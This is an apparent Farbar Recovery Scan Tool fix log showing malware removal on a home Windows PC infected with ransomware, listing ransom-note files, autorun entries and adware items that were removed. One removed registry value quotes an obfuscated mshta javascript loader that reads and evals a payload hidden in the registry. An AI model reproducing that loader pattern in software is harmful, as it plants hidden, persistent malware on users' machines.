Fix result of Farbar Recovery Scan Tool (x64) Version: 17-12-2016
Ran by jacqu (18-12-2016 21:37:29) Run:2
Running from C:\Users\jacqu\Desktop
Loaded Profiles: jacqu (Available Profiles: jacqu)
Boot Mode: Normal
==============================================
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
EmptyTemp:
Cmd: del C:\*_README_*.* /a/s/f/q
() C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6807.exe
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\...\Run: [YbPack] => C:\Users\jacqu\AppData\Local\YbPack\tmp6807.exe [175052 2016-12-18] ()
C:\Users\jacqu\AppData\Local\YbPack
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\...\Run: [**nptp<*>] => "C:\Users\jacqu\AppData\Local\cafe\4c87.bat"
C:\Users\jacqu\AppData\Local\cafe
SearchScopes: HKLM-x32 -> {930A224D-91D9-46AB-A7C9-8D1096794D72} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2509339021-571332613-1028944455-1001 -> {930A224D-91D9-46AB-A7C9-8D1096794D72} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
FF Extension: (PSFactoryBuffer) - C:\Users\jacqu\AppData\Roaming\Mozilla\Firefox\Profiles\6et8u4ni.default\Extensions\{4FDE5BF0-2E49-E1C9-0B26-9DD4705F0FA0} [2016-12-13] [not signed]
2016-12-18 07:43 - 2016-12-18 07:43 - 00066409 _____ C:\Users\jacqu\Desktop\_README_5AGW_.hta
2016-12-18 07:32 - 2016-12-18 07:32 - 00066409 _____ C:\Users\jacqu\Downloads\_README_B270_.hta
2016-12-18 00:27 - 2016-12-18 00:27 - 00172598 _____ C:\Users\jacqu\AppData\Roaming\Fulminate.yg
2016-12-16 22:52 - 2016-12-16 22:52 - 00088576 _____ C:\Users\jacqu\AppData\Roaming\stagnation.dll
2016-12-16 19:48 - 2016-12-18 07:32 - 00282709 _____ C:\Users\jacqu\Downloads\GmrxtjCqmG.98ad
2016-12-16 19:48 - 2016-12-16 19:48 - 00000168 _____ C:\Users\jacqu\Downloads\ATT00001.htm
2016-12-13 20:18 - 2016-12-13 20:18 - 00000000 ____D C:\Users\jacqu\AppData\Local\cafe
2016-12-13 19:49 - 2016-12-18 07:07 - 00000000 ____D C:\Users\jacqu\AppData\Local\AZworks
2016-12-13 19:48 - 2016-12-18 07:47 - 00000000 ____D C:\Users\jacqu\AppData\Local\YbPack
2016-12-13 19:35 - 2016-12-13 19:52 - 00000000 ___HD C:\Users\jacqu\AppData\Local\SysHashTable
2016-08-22 00:30 - 2016-08-22 00:30 - 0000000 _____ () C:\Users\jacqu\AppData\Local\{DB7DE689-648D-40B7-A16A-6342F8B1B6FD}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Classes\f0da: "C:\WINDOWS\system32\mshta.exe" "javascript:TPAi5AKF="Ow";K8z5=new ActiveXObject("WScript.Shell" );pi87Cl="l";kn71kz=K8z5.RegRead("HKCU\\software\\qdssp\\cmtbmdfyc" );m7BDu4V="Oy";eval(kn71kz);K5sVmAys="RLjiWneK";"
*****************
Processes closed successfully.
Restore point was successfully created.
========= del C:\*_README_*.* /a/s/f/q =========
Could Not Find C:\*_README_*.*
========= End of CMD: =========
C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6807.exe => No running process found
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YbPack => value not found.
"C:\Users\jacqu\AppData\Local\YbPack" => not found.
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**nptp<*> => value not found.
"C:\Users\jacqu\AppData\Local\cafe" => not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKCR\Wow6432Node\CLSID\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKU\S-1-5-21-2509339021-571332613-1028944455-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
HKCR\CLSID\{930A224D-91D9-46AB-A7C9-8D1096794D72} => key not found.
C:\Users\jacqu\AppData\Roaming\Mozilla\Firefox\Profiles\6et8u4ni.default\Extensions\{4FDE5BF0-2E49-E1C9-0B26-9DD4705F0FA0} => not found.
"C:\Users\jacqu\Desktop\_README_5AGW_.hta" => not found.
"C:\Users\jacqu\Downloads\_README_B270_.hta" => not found.
"C:\Users\jacqu\AppData\Roaming\Fulminate.yg" => not found.
"C:\Users\jacqu\AppData\Roaming\stagnation.dll" => not found.
"C:\Users\jacqu\Downloads\GmrxtjCqmG.98ad" => not found.
"C:\Users\jacqu\Downloads\ATT00001.htm" => not found.
"C:\Users\jacqu\AppData\Local\cafe" => not found.
"C:\Users\jacqu\AppData\Local\AZworks" => not found.
"C:\Users\jacqu\AppData\Local\YbPack" => not found.
"C:\Users\jacqu\AppData\Local\SysHashTable" => not found.
C:\Users\jacqu\AppData\Local\{DB7DE689-648D-40B7-A16A-6342F8B1B6FD} => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk => Shortcut argument removed successfully.
"HKU\S-1-5-21-2509339021-571332613-1028944455-1001\Software\Classes\f0da" => key removed successfully
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 16143822 B
Java, Flash, Steam htmlcache => 729 B
Windows/system/drivers => 1505228 B
Edge => 85049 B
Chrome => 167338961 B
Firefox => 6921353 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 587810 B
jacqu => 5723142 B
RecycleBin => 97321692 B
EmptyTemp: => 281.9 MB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 21:38:59 ====